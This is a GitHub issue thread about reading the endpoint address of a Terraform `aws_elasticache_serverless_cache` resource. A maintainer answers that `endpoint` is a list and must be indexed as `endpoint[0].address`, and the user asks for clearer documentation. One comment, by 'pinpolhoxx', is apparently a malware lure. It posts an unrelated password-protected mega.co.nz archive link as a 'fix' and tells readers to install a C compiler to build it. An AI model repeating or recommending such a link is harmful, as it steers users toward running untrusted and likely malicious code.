### ISSUE TITLE
[Bug]: Can't get `aws_elasticache_serverless_cache.endpoint.address` value

### ISSUE THREAD

**Issue by speller** [hashicorp/terraform-provider-aws#39417]
### Terraform Core Version

1.5.0

### AWS Provider Version

5.68.0

### Affected Resource(s)

aws_elasticache_serverless_cache

### Expected Behavior

I can get the endpoint details

### Actual Behavior

Error: Unsupported attribute

### Terraform Configuration Files

```terraform
resource "aws_elasticache_serverless_cache" "common-redis" {
  count = local.is_serverless ? 1 : 0
  ...
}

output "host" {
  value = local.is_serverless ? aws_elasticache_serverless_cache.common-redis[0].endpoint.address : ""
}
```

### Steps to Reproduce

Run plan

### Important Factoids

With the following configuration, I have no issues getting the endpoint info:

```terraform
resource "aws_elasticache_cluster" "redis" {
  count = local.is_single_node ? 1 : 0
}

output "host" {
  value = local.is_single_node ? aws_elasticache_cluster.redis[0].cache_nodes.0.address : ""
}
```

But doing the same on the serverless redis gives the following error:

```
│ Error: Unsupported attribute
│ 
│   on .terraform/xx.tf line 2, in output "host":
│    2:   value = local.is_serverless ? aws_elasticache_serverless_cache.common-redis[0].endpoint.address : ""
│ 
│ Can't access attributes on a list of objects. Did you mean to access
│ attribute "address" for a specific element of the list, or across all
│ elements of the list?
```

![image](https://github.com/user-attachments/assets/2ec9f995-6960-47e3-8e62-48654f4527e6)

There are no details and examples about reading the endpoint details in the documentation.

### References

https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/elasticache_serverless_cache

> - endpoint - Represents the information required for client programs to connect to a cache node. See config below for details.
>
>
> Endpoint Configuration
> - address - The DNS hostname of the cache node.
> - port - The port number that the cache engine is listening on. Set as integer.

### Would you like to implement a fix?

None

**Comment by pinpolhoxx** [comment]
I think this will help you.
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by acwwat** [comment]
@speller The `endpoint` and `reader_endpoint` attributes are configuration blocks, so you'll need to refer to either as if it were the first item in a list (of one item).

```tf
aws_elasticache_serverless_cache.common-redis[0].endpoint[0].address
```

**Comment by speller** [comment]
@acwwat thank you, it works.

At the same time, I think the documentation should be more clear regarding this to avoid confusion.

**Comment by acwwat** [comment]
I don't know if it helps, but I've standardize the description of configuration blocks and how they are linked from the arguments/attributes.

**Comment by speller** [comment]
@acwwat Thank you for the update. But for a regular user like myself, the term "config block" isn't descriptive and doesn't bring an intuitive understanding of how to read data from it. I also still don't really understand how the term "configuration block" relates to the data attributes. I don't need to configure anything to get the endpoint data, just read it. If it will be explicitly mentioned that the endpoint data attribute is a **list**, then everyone will know that they should use `endpoint[0]` or `endpoint.0` to read from it.
